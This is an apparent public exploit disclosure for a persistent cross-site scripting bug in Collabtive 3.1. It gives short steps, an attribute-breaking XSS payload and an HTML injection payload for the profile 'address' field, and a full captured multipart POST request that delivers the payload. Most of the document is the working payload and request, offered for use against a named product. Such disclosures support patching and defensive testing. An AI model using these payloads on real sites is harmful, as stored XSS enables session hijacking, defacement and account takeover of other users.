# Exploit Title: Collabtive 3.1 - 'address' Persistent Cross-Site Scripting # Date: 2021-01-23 # Exploit Author: Deha Berkin Bir # Vendor Homepage: https://collabtive.o-dyn.de/ # Version: 3.1 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Login to your account. 2- Go to the profile edit page and write your XSS/HTML payload into "Address" section. - You will see the executed HTML payload at there. (HTML Injection) - You will see the executed XSS payload at profile edit section. (XSS) ==> Executed Payloads <== XSS Payload ==> " onfocus="alert(1)" autofocus=" HTML Payload ==>

DehaBerkinBir

==> HTTP Request <== POST /manageuser.php?action=edit HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://(HOST)/manageuser.php?action=editform&id=1 Content-Type: multipart/form-data; boundary=---------------------------12097618915709137911841560297 Content-Length: 2327 Connection: close Cookie: activeSlideIndex=0; PHPSESSID=oj123o7asdfasdfu4pts2g Upgrade-Insecure-Requests: 1 -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="name" admin -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="userfile"; filename="" Content-Type: application/octet-stream -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="file-avatar" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="company" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="email" dehaberkinbir@hotmail.com -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="web" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="tel1" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="tel2" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="address1" " onfocus="alert(1)" autofocus=" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="zip" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="address2" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="country" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="state" admin -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="gender" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="locale" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="admin" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="oldpass" admin -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="newpass" -----------------------------12097618915709137911841560297 Content-Disposition: form-data; name="repeatpass" -----------------------------12097618915709137911841560297--